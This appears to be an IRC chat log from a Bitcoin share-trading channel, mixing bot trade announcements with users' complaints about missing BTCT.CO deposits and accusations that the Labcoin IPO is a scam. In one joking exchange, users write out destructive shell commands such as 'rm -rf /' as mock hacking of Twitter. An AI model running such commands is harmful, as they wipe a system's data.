[HAVELOCK] [HIM] 10 @ 0.148 = 1.48 BTC [+] Jul 31 22:33:44 this might instigate a cache update Jul 31 22:34:09 [HAVELOCK] [AM100] 2 @ 0.0398 = 0.0796 BTC [-] Jul 31 22:34:11 [HAVELOCK] [AM100] 3 @ 0.0398 = 0.1194 BTC [-] Jul 31 22:34:48 ThickAsThieves nope Jul 31 22:34:54 says i dun have the funds Jul 31 22:35:13 buddy has same issue Jul 31 22:35:21 [HAVELOCK] [AM100] 1 @ 0.0398999 BTC [+] Jul 31 22:35:22 http://trilema.com/2013/the-anatomy-of-a-scam/ Jul 31 22:35:22 + people on the labcoin thread Jul 31 22:35:23 here we go. Jul 31 22:35:27 The anatomy of a scam. pe Trilema - Un blog de Mircea Popescu. Jul 31 22:35:30 [BTCTC] [ASICMINER-PT] 1 @ 3.82 BTC [+] Jul 31 22:35:37 [BTCTC] [TAT.ASICMINER] 9 @ 0.03749 = 0.3374 BTC [+] Jul 31 22:35:40 [HAVELOCK] [AM100] 2 @ 0.0398999 = 0.0798 BTC [+] Jul 31 22:36:09 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 31 22:36:18 [BTCTC] [ASICMINER-PT] 1 @ 3.815 BTC [-] Jul 31 22:36:20 [BTCTC] [CRYPTO-TRADE] 8 @ 0.192 = 1.536 BTC [-] Jul 31 22:36:27 theissue with labcoin Jul 31 22:36:31 [BTCTC] [CRYPTO-TRADE] 7 @ 0.191 = 1.337 BTC [-] Jul 31 22:36:32 isnt that it could be a scam Jul 31 22:36:40 [BTCTC] [ACTIVEMINING] 25 @ 0.004299 = 0.1075 BTC [+] Jul 31 22:36:42 deprived pointed out, that even he will invest into those Jul 31 22:36:50 because he knows he can flip for higher Jul 31 22:36:55 ThickAsThieves lol, everyone is having this issue Jul 31 22:36:56 [BTCTC] [ACTIVEMINING] 2018 @ 0.0043 = 8.6774 BTC [+] Jul 31 22:36:56 and take advantage of them Jul 31 22:37:00 23 mins to go Jul 31 22:37:04 [BTCTC] [ACTIVEMINING] 10 @ 0.004301 = 0.043 BTC [+] Jul 31 22:37:17 [BTCTC] [ACTIVEMINING] 25 @ 0.004301 = 0.1075 BTC [+] Jul 31 22:37:17 Ukyo irt's not a matter of it could be a scam Jul 31 22:37:18 labcoin posted in the thread that burnsy is making some ustom script Jul 31 22:37:18 so insider trading? Jul 31 22:37:19 it's a scam. Jul 31 22:37:20 [BTCTC] [ACTIVEMINING] 1300 @ 0.0043 = 5.59 BTC [-] Jul 31 22:37:24 [BTCTC] [ASICMINER-PT] 5 @ 3.81 = 19.05 BTC [-] Jul 31 22:37:26 [BTCTC] [ACTIVEMINING] 25 @ 0.004003 = 0.1001 BTC [-] Jul 31 22:37:28 so it may not be in 23 min Jul 31 22:37:47 [BTCTC] [ACTIVEMINING] 1895 @ 0.004002 = 7.5838 BTC [-] Jul 31 22:37:52 [BTCTC] [ACTIVEMINING] 2000 @ 0.004 = 8 BTC [-] Jul 31 22:37:54 [BTCTC] [ACTIVEMINING] 23605 @ 0.004 = 94.42 BTC [-] Jul 31 22:38:05 hmm Jul 31 22:38:29 yeah if ppl don't have the funds because of a server issue, the IPO should be cancelled lol Jul 31 22:39:17 [BTCTC] [ACTIVEMINING] 15 @ 0.004 = 0.06 BTC [-] Jul 31 22:39:46 [BTCTC] [ASICMINER-PT] 1 @ 3.905 BTC [+] Jul 31 22:39:49 try again in 2 weeks? Jul 31 22:39:49 [BTCTC] [ACTIVEMINING] 2000 @ 0.004 = 8 BTC [-] Jul 31 22:39:53 [BTCTC] [ASICMINER-PT] 1 @ 3.906 BTC [+] Jul 31 22:40:11 I also would like to urge everyone not to 'freak out' if something odd happens to order depth, placed orders or other details on BTCT.CO at freeze time. The way Burnside is handling the share-disbursement is brand new and I would just assume that it is possible that it may interfere with the way 'things look' for a few hours. << :D Jul 31 22:40:19 actually a 2-week announcement period would do some good Jul 31 22:40:32 prevent all this short-term hype Jul 31 22:40:43 [BTCTC] [ASICMINER-PT] 1 @ 3.909 BTC [+] Jul 31 22:40:43 [BTCTC] [ACTIVEMINING] 250 @ 0.004002 = 1.0005 BTC [+] Jul 31 22:40:51 [BTCTC] [ACTIVEMINING] 150 @ 0.004 = 0.6 BTC [-] Jul 31 22:40:53 [BTCTC] [ASICMINER-PT] 1 @ 3.905 BTC [-] Jul 31 22:42:01 [BTCTC] [ACTIVEMINING] 10 @ 0.004444 = 0.0444 BTC [+] Jul 31 22:42:07 [BTCTC] [ACTIVEMINING] 50 @ 0.00448 = 0.224 BTC [+] Jul 31 22:42:08 oh yes, last minute coding? nothing bad can happen here Jul 31 22:42:08 ThickAsThieves look into the thread. all the shiolls are either made after march 30 or bought 2011 hacked accounts. Jul 31 22:42:09 [BTCTC] [TAT.ASICMINER] 79 @ 0.03748 = 2.9609 BTC [-] Jul 31 22:42:13 [BTCTC] [ACTIVEMINING] 240 @ 0.004498 = 1.0795 BTC [+] Jul 31 22:42:18 [BTCTC] [ACTIVEMINING] 50 @ 0.0045 = 0.225 BTC [+] Jul 31 22:42:23 this is so clearly a scam it screams. Jul 31 22:42:52 [BTCTC] [ACTIVEMINING] 25 @ 0.004001 = 0.1 BTC [-] Jul 31 22:42:57 [BTCTC] [ACTIVEMINING] 113 @ 0.004 = 0.452 BTC [-] Jul 31 22:43:34 [BTCTC] [ASICMINER-PT] 1 @ 3.811 BTC [-] Jul 31 22:43:40 [BTCTC] [ASICMINER-PT] 17 @ 3.8 = 64.6 BTC [-] Jul 31 22:43:42 [BTCTC] [ACTIVEMINING] 54 @ 0.0041 = 0.2214 BTC [+] Jul 31 22:43:45 [BTCTC] [ASICMINER-PT] 2 @ 3.79 = 7.58 BTC [-] Jul 31 22:43:46 [BTCTC] [ACTIVEMINING] 10 @ 0.004005 = 0.0401 BTC [-] Jul 31 22:43:51 [HAVELOCK] [AM100] 1 @ 0.0398 BTC [-] Jul 31 22:43:58 [BTCTC] [ASICMINER-PT] 5 @ 4.65 = 23.25 BTC [+] Jul 31 22:44:27 [BTCTC] [DMS.MINING] 2 @ 0.008 = 0.016 BTC [-] Jul 31 22:44:46 [BTCTC] [COGNITIVE] 20 @ 0.45 = 9 BTC [-] Jul 31 22:44:47 [BTCTC] [ASICMINER-PT] 4 @ 4.7 = 18.8 BTC [+] Jul 31 22:44:50 [BTCTC] [COGNITIVE] 5 @ 0.41 = 2.05 BTC [-] Jul 31 22:44:53 [BTCTC] [COGNITIVE] 10 @ 0.3855 = 3.855 BTC [-] Jul 31 22:45:09 [BTCTC] [ACTIVEMINING] 4117 @ 0.004 = 16.468 BTC [-] Jul 31 22:45:12 [BTCTC] [COGNITIVE] 6 @ 0.3851 = 2.3106 BTC [-] Jul 31 22:45:14 [BTCTC] [ASICMINER-PT] 1 @ 3.79 BTC [-] Jul 31 22:45:19 [BTCTC] [COGNITIVE] 4 @ 0.3851 = 1.5404 BTC [-] Jul 31 22:45:30 [BTCTC] [ACTIVEMINING] 2500 @ 0.004001 = 10.0025 BTC [+] Jul 31 22:45:47 sandstorm is holding up well Jul 31 22:46:02 [BTCTC] [ACTIVEMINING] 286 @ 0.004001 = 1.1443 BTC [+] Jul 31 22:46:08 [HAVELOCK] [AM100] 2 @ 0.0398 = 0.0796 BTC [-] Jul 31 22:46:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.03747 = 0.2248 BTC [-] Jul 31 22:46:42 [BTCTC] [TAT.ASICMINER] 80 @ 0.037 = 2.96 BTC [-] Jul 31 22:46:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.037 = 0.37 BTC [-] Jul 31 22:46:53 [BTCTC] [TAT.ASICMINER] 18 @ 0.037 = 0.666 BTC [-] Jul 31 22:46:58 [BTCTC] [TAT.ASICMINER] 49 @ 0.03676 = 1.8012 BTC [-] Jul 31 22:47:13 [BTCTC] [ACTIVEMINING] 586 @ 0.004001 = 2.3446 BTC [+] Jul 31 22:47:36 ThickAsThieves anything? Jul 31 22:47:39 13 mins Jul 31 22:48:02 to what? Jul 31 22:48:22 labcoin lock Jul 31 22:48:25 If you don't know it's too late lol Jul 31 22:48:31 btct is having issues Jul 31 22:48:38 man Jul 31 22:48:39 burnside: you around bud? Jul 31 22:48:43 [BTCTC] [COGNITIVE] 12 @ 0.4 = 4.8 BTC [+] Jul 31 22:48:51 burnside must be busy as hell Jul 31 22:48:57 Burnside isnt around very often Jul 31 22:49:02 i dont work for BTCT Jul 31 22:49:07 why do they need to do everything in a hurry?... Jul 31 22:49:13 i have 11 minutes and my btc just confirmed then vanished in btct. im freaking out man! ;)O Jul 31 22:49:16 my deposits worked fine afaik Jul 31 22:49:19 [BTCTC] [S.BBET-PT] 1 @ 0.001602 BTC [-] Jul 31 22:49:43 dont want to sell my asicminer,activeminign,cognitive shares as theyre all down due to the labcoin hypetrain Jul 31 22:49:46 you'll have to buy at higher prices later Jul 31 22:49:47 so was hoping he was here Jul 31 22:49:47 sorry Jul 31 22:49:59 seems that way Jul 31 22:50:04 :( Jul 31 22:50:09 cancel the damn IPO Jul 31 22:50:12 [BTCTC] [ASICMINER-PT] 2 @ 3.79 = 7.58 BTC [-] Jul 31 22:50:16 yeah i got the same problem... 3 confirms and 0 balance Jul 31 22:50:16 this is insanity Jul 31 22:50:19 so labcoin is simply selling at at 0.001? Jul 31 22:50:47 [BTCTC] [S.BBET-PT] 25 @ 0.001601 = 0.04 BTC [-] Jul 31 22:50:48 [BTCTC] [ASICMINER-PT] 3 @ 3.79 = 11.37 BTC [-] Jul 31 22:50:57 [BTCTC] [DMS.PURCHASE] 8 @ 0.03353 = 0.2682 BTC [+] Jul 31 22:51:01 yes Jul 31 22:51:02 [BTCTC] [TAT.MINIGAME] 250 @ 0.0002601 = 0.065 BTC [-] Jul 31 22:51:05 [BTCTC] [TAT.MINIGAME] 4 @ 0.00026 = 0.001 BTC [-] Jul 31 22:51:07 as i understand it, Jul 31 22:51:09 [BTCTC] [TAT.MINIGAME] 100 @ 0.000255 = 0.0255 BTC [-] Jul 31 22:51:11 [BTCTC] [TAT.MINIGAME] 4 @ 0.00025 = 0.001 BTC [-] Jul 31 22:51:15 [BTCTC] [TAT.MINIGAME] 300 @ 0.0002401 = 0.072 BTC [-] Jul 31 22:51:17 [BTCTC] [TAT.MINIGAME] 400 @ 0.0002172 = 0.0869 BTC [-] Jul 31 22:51:21 burnside is failing this so badly Jul 31 22:51:24 [BTCTC] [TAT.MINIGAME] 400 @ 0.0002101 = 0.084 BTC [-] Jul 31 22:51:26 [BTCTC] [TAT.MINIGAME] 1000 @ 0.00021 = 0.21 BTC [-] Jul 31 22:51:31 the bigger your bankroll, the more sares you get in proportion Jul 31 22:51:34 [BTCTC] [TAT.MINIGAME] 532 @ 0.0002002 = 0.1065 BTC [-] Jul 31 22:51:35 this is not good Jul 31 22:51:36 I'm sure the problem will be fixed Jul 31 22:51:40 After the IPO Jul 31 22:51:40 9 mins Jul 31 22:51:50 [BTCTC] [ACTIVEMINING] 50 @ 0.004002 = 0.2001 BTC [+] Jul 31 22:51:58 burnside should atleast delay Jul 31 22:52:04 It seems intentional to me Jul 31 22:52:11 The site is working fine, just deposits magically stopped Jul 31 22:52:13 [BTCTC] [ACTIVEMINING] 534 @ 0.004001 = 2.1365 BTC [-] Jul 31 22:52:16 look, Jul 31 22:52:16 To create more hype for the IPO Jul 31 22:52:22 dont invest with emotion Jul 31 22:52:23 Then, once the IPO occurs, all deposits will magically appear Jul 31 22:52:26 calm down Jul 31 22:52:36 ThickAsThieves can u pm burnside? Jul 31 22:52:40 [HAVELOCK] [AM100] 6 @ 0.0398999 = 0.2394 BTC [+] Jul 31 22:52:40 So everyone can drive the price up higher Jul 31 22:52:40 no Jul 31 22:52:44 k Jul 31 22:52:47 you can if you like Jul 31 22:52:51 but he wont answer Jul 31 22:52:58 obv he is busy Jul 31 22:52:59 yea i understand Jul 31 22:53:02 obv Jul 31 22:53:04 i'm sure he is working on it Jul 31 22:53:13 he should delay :( Jul 31 22:53:22 Of course he is, to drive up the price higher after the IPO :3 it's pretty smart Jul 31 22:53:37 "Unfortunately there is ABSOLUTELY nothing I can personally do about possible issues with BTCT.CO Jul 31 22:53:37 I do hope everything is resolved before cut-off." Jul 31 22:54:12 good old glbse days Jul 31 22:54:19 are back :D Jul 31 22:54:29 heh Jul 31 22:54:40 maybe the chinese have hijacked that AS Jul 31 22:54:50 [BTCTC] [ACTIVEMINING] 1000 @ 0.004003 = 4.003 BTC [+] Jul 31 22:54:52 considering its in 5mins guess this is a bust lol Jul 31 22:54:52 [BTCTC] [ACTIVEMINING] 1000 @ 0.004003 = 4.003 BTC [+] Jul 31 22:54:53 [BTCTC] [ACTIVEMINING] 1500 @ 0.004001 = 6.0015 BTC [-] Jul 31 22:54:54 the internet feels broken to me, let's go home Jul 31 22:55:05 i wonder how many scams you can fit under one scam? Jul 31 22:55:15 [HAVELOCK] [AM100] 2 @ 0.0398999 = 0.0798 BTC [+] Jul 31 22:55:35 if no one ever discovers the first scam, the answer is many Jul 31 22:55:42 [BTCTC] [ASICMINER-PT] 4 @ 3.79 = 15.16 BTC [-] Jul 31 22:55:45 [BTCTC] [ASICMINER-PT] 1 @ 3.79 BTC [-] Jul 31 22:55:50 [BTCTC] [CRYPTO-TRADE] 1 @ 0.191 BTC [-] Jul 31 22:55:50 fuck fuck fuck Jul 31 22:55:53 yup Jul 31 22:55:54 this is NOT good Jul 31 22:55:59 ppl are gonna be PISSED Jul 31 22:56:00 [BTCTC] [ASICMINER-PT] 2 @ 3.771 = 7.542 BTC [-] Jul 31 22:56:00 bunch of pages of people with same issue on forums Jul 31 22:56:11 TAT , so what is the new updated plan - still going off at 8 central time ? Jul 31 22:56:19 definitely let the forums get you worked up Jul 31 22:56:24 best idea. hands down Jul 31 22:56:24 Trading starts at 8 i think Jul 31 22:56:29 oh well, at least i got to see my profits in activemining get cut in half overnight ;) Jul 31 22:56:32 [BTCTC] [ASICMINER-PT] 7 @ 3.771 = 26.397 BTC [-] Jul 31 22:56:32 lol why is everyone asking ThickAsThieves ? Jul 31 22:56:35 please direct all questions, of any nature, to me Jul 31 22:56:44 He reads the forums Jul 31 22:56:50 that's a point. Jul 31 22:56:53 ThickAsThieves knows Jul 31 22:56:53 lol Jul 31 22:56:54 [BTCTC] [ASICMINER-PT] 4 @ 3.771 = 15.084 BTC [-] Jul 31 22:56:56 he's the investment guy Jul 31 22:56:58 so Jul 31 22:57:00 i heard it on the forum Jul 31 22:57:04 BTCTCO is going the way of glbse Jul 31 22:57:05 no shares for lots of ppl Jul 31 22:57:10 [BTCTC] [ASICMINER-PT] 2 @ 3.771 = 7.542 BTC [-] Jul 31 22:57:11 i havent even read the prospectus for labcoin Jul 31 22:57:11 [BTCTC] [S.MPOE-PT] 1 @ 0.0008328 BTC [-] Jul 31 22:57:16 i just looked at the OP Jul 31 22:57:18 burn will have to cancel this shit Jul 31 22:57:22 and started making fun Jul 31 22:57:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.03746 = 0.0749 BTC [+] Jul 31 22:57:38 [BTCTC] [ASICMINER-PT] 1 @ 3.771 BTC [-] Jul 31 22:57:40 [BTCTC] [BASIC-MINING] 1 @ 0.3301 BTC [+] Jul 31 22:57:44 [BTCTC] [BASIC-MINING] 3 @ 0.3301 = 0.9903 BTC [+] Jul 31 22:57:45 im a bit disappointed to have missed out but I find people losing their shit over it pretty entertaining... Jul 31 22:57:46 [BTCTC] [ACTIVEMINING] 25 @ 0.004292 = 0.1073 BTC [+] Jul 31 22:57:47 [BTCTC] [ASICMINER-PT] 2 @ 3.76 = 7.52 BTC [-] Jul 31 22:57:50 [BTCTC] [ACTIVEMINING] 865 @ 0.004293 = 3.7134 BTC [+] Jul 31 22:57:51 [BTCTC] [COGNITIVE] 5 @ 0.41 = 2.05 BTC [+] Jul 31 22:57:52 [BTCTC] [BASIC-MINING] 1 @ 0.33 BTC [-] Jul 31 22:58:05 3mins, can't wait. Jul 31 22:58:06 you have it wrong, burnsy is not beholden to you, nor is labcoin Jul 31 22:58:07 all i know is, I'm not selling these 4 million ripples until i get all my missing coins back Jul 31 22:58:08 ystarnaud_: not losing my shit, i actually only deposited to buy ASICMINER on the cheap :) Jul 31 22:58:10 you dont even own shares Jul 31 22:58:27 a oversubscribed IPO does not make Burnside a scammer, or a idiot - you should look back on the Avalon orders to see pure chaos Jul 31 22:58:28 I'm just stating my opinion on the deposits not working Jul 31 22:58:31 ystarnaud_ how long have you been in btc Jim ? Jul 31 22:58:58 "I am commenting on how everyone thinks that there are 5 minutes left, but the deadline clearly said EST, not EDT, which means there are 65 minutes left, not 5, and I am anxious to see how they resolve that difference!" Jul 31 22:59:01 whut Jul 31 22:59:03 18mil order Jul 31 22:59:14 hollywoodundead it's not the oversubscribed that makes him a scammer. however, i do recall the original walletbit fun lol Jul 31 22:59:16 mircea_popescu: since about oct 12 Jul 31 22:59:25 how'd you like it ? Jul 31 22:59:45 wait it already started trading? Jul 31 22:59:50 fun stuff Jul 31 23:00:25 nevermind, my bad wrong screen Jul 31 23:00:39 "You could delay the IPO another hour or so to get things fixed before, but in that case I'd talk to burnside ASAP to ask him, if it's possible to resolve in a shorter timeframe." -> "I have messaged and emailed Ethan and I am sure he has noted the issue. I will let him answer since there is nothing I can do to resolve the issue and anything I say can/would likely be wrong." Jul 31 23:00:54 tango down! Jul 31 23:00:57 [HAVELOCK] [AM100] 2 @ 0.0397 = 0.0794 BTC [-] Jul 31 23:00:59 [BTCTC] [ACTIVEMINING] 10 @ 0.004199 = 0.042 BTC [-] Jul 31 23:01:06 jcpham, tango? Jul 31 23:01:13 [BTCTC] [ACTIVEMINING] 25 @ 0.004277 = 0.1069 BTC [+] Jul 31 23:01:17 [BTCTC] [ACTIVEMINING] 415 @ 0.004278 = 1.7754 BTC [+] Jul 31 23:01:26 [BTCTC] [ACTIVEMINING] 25 @ 0.004276 = 0.1069 BTC [-] Jul 31 23:01:28 ok you go t me, it's really cash Jul 31 23:01:28 [BTCTC] [ACTIVEMINING] 523 @ 0.004277 = 2.2369 BTC [+] Jul 31 23:01:30 [BTCTC] [ACTIVEMINING] 582 @ 0.004275 = 2.4881 BTC [-] Jul 31 23:01:46 [BTCTC] [ACTIVEMINING] 25 @ 0.004016 = 0.1004 BTC [-] Jul 31 23:01:48 [BTCTC] [ACTIVEMINING] 15 @ 0.004015 = 0.0602 BTC [-] Jul 31 23:01:50 [BTCTC] [ACTIVEMINING] 862 @ 0.004014 = 3.4601 BTC [-] Jul 31 23:01:53 [BTCTC] [ACTIVEMINING] 1 @ 0.004003 BTC [-] Jul 31 23:01:54 [BTCTC] [ACTIVEMINING] 1000 @ 0.004002 = 4.002 BTC [-] Jul 31 23:01:56 [BTCTC] [ACTIVEMINING] 2 @ 0.004001 = 0.008 BTC [-] Jul 31 23:01:59 [BTCTC] [ACTIVEMINING] 3000 @ 0.004 = 12 BTC [-] Jul 31 23:02:02 [BTCTC] [ACTIVEMINING] 208 @ 0.004 = 0.832 BTC [-] Jul 31 23:02:26 chmod755 now would be the perfect time for #hashtag BTCT.CO_News twitter account Jul 31 23:02:33 [BTCTC] [COGNITIVE] 15 @ 0.7 = 10.5 BTC [+] Jul 31 23:02:35 [BTCTC] [GSDPT] 45 @ 0.003357 = 0.1511 BTC [+] Jul 31 23:02:37 [BTCTC] [ASICMINER-PT] 1 @ 3.771 BTC [+] Jul 31 23:02:42 [BTCTC] [GSDPT] 917 @ 0.003356 = 3.0775 BTC [-] Jul 31 23:02:54 jcpham, i already have too many twitter accounts :P Jul 31 23:03:02 [BTCTC] [COGNITIVE] 4 @ 0.71 = 2.84 BTC [+] Jul 31 23:03:07 twitter is dead to me Jul 31 23:03:14 is it possible to delete Jul 31 23:03:35 jcpham, rm -rf http://www.twitter.com Jul 31 23:04:05 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1909 BTC [-] Jul 31 23:04:08 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1909 BTC [-] Jul 31 23:04:11 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1908 BTC [-] Jul 31 23:04:12 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1907 BTC [-] Jul 31 23:04:15 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1906 BTC [-] Jul 31 23:04:16 so, after the 25000k bitcoins get into and fill the 7000k order book. do they all madly rush back into remaining assets? Jul 31 23:04:18 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1905 BTC [-] Jul 31 23:04:20 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1904 BTC [-] Jul 31 23:04:23 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1903 BTC [-] Jul 31 23:04:25 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1902 BTC [-] Jul 31 23:04:29 root@root:~# rm -rf http://www.twitter.com Jul 31 23:04:30 rm: cannot remove `http://www.twitter.com': No such file or directory Jul 31 23:04:31 25000k bitcoins? Jul 31 23:04:35 guessing Jul 31 23:04:39 probably more Jul 31 23:04:41 jcpham, oh sry Jul 31 23:04:41 i was root@root too Jul 31 23:04:46 storms, what did i miss? Jul 31 23:04:52 you need to be root@twitter.com and then you do rm -rf / Jul 31 23:04:57 hollywoodundead: the coins will probably locked till trading on lab resumes Jul 31 23:05:02 gotcha ;) Jul 31 23:05:05 ThickAsThieves any news? Jul 31 23:05:09 jcpham, change your hostname to twitter.com Jul 31 23:05:12 still not locked afaik Jul 31 23:05:16 then it will surely work :P Jul 31 23:05:17 nooooo Jul 31 23:05:19 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [+] Jul 31 23:05:19 so there is another hour? Jul 31 23:05:23 XD Jul 31 23:05:24 [BTCTC] [ASICMINER-PT] 1 @ 3.76 BTC [-] Jul 31 23:06:13 "What a clusterfuck. I didn't realize BTCT was such a piece of shit. I'm going to back to using bitfunder now. See you all later." Jul 31 23:06:29 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.002935 = 0.0059 BTC [+] Jul 31 23:07:23 the part about btct is true, however i wonder if bitfunder is better Jul 31 23:08:02 so I missed most of the action, but deposited 20 BTC on bitct.co and they vanished into thin air Jul 31 23:08:16 really? i like how burnsides handles things Jul 31 23:08:16 is this also related to the clusterfuck? Jul 31 23:08:19 he tries his best Jul 31 23:08:23 so there is an hour still? Jul 31 23:08:29 lol Jul 31 23:08:31 i dunno Jul 31 23:08:33 and addresses every request and question quite fast Jul 31 23:09:09 omg where can i go to post and complain about the things Jul 31 23:09:19 someone needs to hear it Jul 31 23:09:28 please direct all questions and complaints to me Jul 31 23:09:31 i care Jul 31 23:09:41 lol Jul 31 23:09:46 Dear ThickAsThieves: FUCK PISS SHIT DAMN FUCK SHIT Jul 31 23:09:53 Sincerely, jcpham Jul 31 23:10:03 TAT, you're aware of deposits going missing on btct.co? Jul 31 23:10:05 I hear ya, bro Jul 31 23:10:12 I am, sorry about that Jul 31 23:10:26 okay Jul 31 23:10:45 at least the problem is known then :) Jul 31 23:10:47 can i help you with anything else today? Jul 31 23:11:01 fill my tourettes med, please Jul 31 23:11:08 I'd like 2 grams of blow and a bunch of hookes Jul 31 23:11:21 locked :( Jul 31 23:11:22 to keep my mind off this Jul 31 23:11:29 i transferred btc in time Jul 31 23:11:37 i think it's unfair to ppl Jul 31 23:11:43 Please load the Tor browser package and visit the designated .onion address for Silk Road. Jul 31 23:11:51 hahaha Jul 31 23:12:00 anyone interested in buying labcoin shares? bids accepted here or via pm :p Jul 31 23:12:09 [BTCTC] [DMS.SELLING] 100 @ 0.02161 = 2.161 BTC [+] Jul 31 23:12:12 [BTCTC] [DMS.SELLING] 25 @ 0.0216 = 0.54 BTC [-] Jul 31 23:12:13 [BTCTC] [DMS.SELLING] 255 @ 0.02151 = 5.4851 BTC [-] Jul 31 23:12:15 [BTCTC] [DMS.SELLING] 11 @ 0.02121 = 0.2333 BTC [-] Jul 31 23:12:18 [BTCTC] [DMS.SELLING] 1 @ 0.0212 BTC [-] Jul 31 23:12:20 [BTCTC] [DMS.SELLING] 58 @ 0.02052 = 1.1902 BTC [-] Jul 31 23:12:28 hehe Jul 31 23:13:25 "And NOW my money shows up!! Minutes after it closes. Jul 31 23:13:25 Looks like a scam to me. Maybe I should be happy I wasn't able to get involved!" Jul 31 23:13:27 [BTCTC] [TAT.MINIGAME] 700 @ 0.00025 = 0.175 BTC [+] Jul 31 23:13:30 moar 100% new ppl to declare they've made deposits to btct pls. Jul 31 23:13:41 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002935 BTC [+] Jul 31 23:13:43 i think i need about 20 or so to actually consider it. Jul 31 23:14:37 Steve walks warily down the street with the brim pulled way down low Jul 31 23:14:44 mp should buy BTCT Jul 31 23:14:54 they would all cry Jul 31 23:15:15 literally Jul 31 23:15:20 I will not do business with a racist! Jul 31 23:15:32 haha Jul 31 23:15:44 ThickAsThieves, that's racistist Jul 31 23:15:59 [HAVELOCK] [AM100] 1 @ 0.0397989 BTC [+] Jul 31 23:15:59 So I'll be getting like what... 3 shares of labcoin Jul 31 23:16:00 woot Jul 31 23:17:30 [HAVELOCK] [AM100] 2 @ 0.0397989 = 0.0796 BTC [+] Jul 31 23:18:14 ;;generate Jul 31 23:18:15 Error: "generate" is not a valid command. Jul 31 23:18:17 [BTCTC] [BFMINES] 2 @ 0.003999 = 0.008 BTC [-] Jul 31 23:18:17 ;;gen Jul 31 23:18:17 Error: "gen" is not a valid command. Jul 31 23:18:19 TaT is the btct man, he got my deposits credited! Thanks love you man Jul 31 23:18:45 ;;genrate 1000 Jul 31 23:18:46 The expected generation output, at 1000.0 Mhps, given difficulty of 31256960.7278, is 0.0160894247144 BTC per day and 0.000670392696434 BTC per hour. Jul 31 23:19:46 [HAVELOCK] [AM100] 2 @ 0.0397989 = 0.0796 BTC [+] Jul 31 23:19:47 You're welcome Jul 31 23:19:54 how mujch per minute! Jul 31 23:20:33 ThickAsThieves mnt Jul 31 23:20:43 can I hire you to do metasupport, too? Jul 31 23:20:54 yes Jul 31 23:20:54 TAT... what a guy... Jul 31 23:20:56 [BTCTC] [ACTIVEMINING] 995 @ 0.004432 = 4.4098 BTC [+] Jul 31 23:21:09 I am the herd whisperer Jul 31 23:21:19 [BTCTC] [BASIC-MINING] 4 @ 0.3797 = 1.5188 BTC [+] Jul 31 23:21:20 [BTCTC] [ASICMINER-PT] 1 @ 3.894 BTC [+] Jul 31 23:21:23 [BTCTC] [BASIC-MINING] 3 @ 0.3798 = 1.1394 BTC [+] Jul 31 23:21:25 [BTCTC] [BASIC-MINING] 3 @ 0.3799 = 1.1397 BTC [+] Jul 31 23:21:29 [BTCTC] [BASIC-MINING] 1 @ 0.3819 BTC [+] Jul 31 23:21:35 Okay. I'll escalate any issues that need it to you. Jul 31 23:21:41 [BTCTC] [BASIC-MINING] 1 @ 0.382 BTC [+] Jul 31 23:22:32 [BTCTC] [TAT.ASICMINER] 20 @ 0.0367 = 0.734 BTC [-] Jul 31 23:22:58 [BTCTC] [TAT.MINIGAME] 1 @ 0.000203 BTC [-] Jul 31 23:23:18 [BTCTC] [ACTIVEMINING] 4 @ 0.004434 = 0.0177 BTC [+] Jul 31 23:23:19 [BTCTC] [TAT.MINIGAME] 10 @ 0.0002021 = 0.002 BTC [-] Jul 31 23:23:45 [BTCTC] [TAT.MINIGAME] 66 @ 0.000201 = 0.0133 BTC [-] Jul 31 23:24:01 WTF, now that is stupid Jul 31 23:24:09 ? Jul 31 23:24:18 [BTCTC] [ACTIVEMINING] 25 @ 0.004497 = 0.1124 BTC [+] Jul 31 23:24:22 [BTCTC] [PAJKA.BOND] 20 @ 0.02519 = 0.5038 BTC [-] Jul 31 23:24:24 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00283 = 0.0057 BTC [-] Jul 31 23:24:26 [BTCTC] [TAT.ASICMINER] 164 @ 0.0367 = 6.0188 BTC [-] Jul 31 23:24:35 [BTCTC] [TAT.MINIGAME] 913 @ 0.0002002 = 0.1828 BTC [-] Jul 31 23:24:54 minigame, on the day it is shown to work- sold of so someone might be able to get labcoin Jul 31 23:25:01 off Jul 31 23:25:05 EVERYONE AFFECTED BY NO BALANCE, I JUST FOUND A FIX Jul 31 23:25:08 Go withdraw 0.01 Jul 31 23:25:17 That fixeed my balance, I now have 12.09356750 BTC Jul 31 23:25:27 [BTCTC] [ACTIVEMINING] 30 @ 0.004498 = 0.1349 BTC [+] Jul 31 23:25:32 no, you just refreshed your screen Jul 31 23:25:41 known problem with btct balance Jul 31 23:25:42 [BTCTC] [ASICMINER-PT] 1 @ 3.762 BTC [-] Jul 31 23:25:43 I read it on bitcointalk Jul 31 23:25:50 oh that makes it real then Jul 31 23:25:52 It worked for two others as well Jul 31 23:26:00 I don't care hollywoodundead, it's worth a try and it just worked for me Jul 31 23:26:06 [BTCTC] [ACTIVEMINING] 187 @ 0.0045 = 0.8415 BTC [+] Jul 31 23:26:06 maybe burnside just happened to find a thumb drive? http://www.businessinsider.com/the-biggest-threat-to-national-security-is-the-thumb-drive-2013-7 Jul 31 23:26:18 https://bitcointalk.org/index.php?topic=263445.msg2842011#msg2842011 Jul 31 23:26:23 [BTCTC] [TAT.MINIGAME] 3000 @ 0.0002002 = 0.6006 BTC [-] Jul 31 23:26:24 You lose nothing by trying it Jul 31 23:26:25 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Jul 31 23:26:27 just go to the wallet and look at the balance- it does not match the main balance at the top Jul 31 23:26:30 Thanks for the sarcasm anyway Jul 31 23:26:35 It does lol Jul 31 23:27:14 now it will, it has been that way for a long time Jul 31 23:27:31 [BTCTC] [TAT.MINIGAME] 200 @ 0.0002002 = 0.04 BTC [-] Jul 31 23:27:35 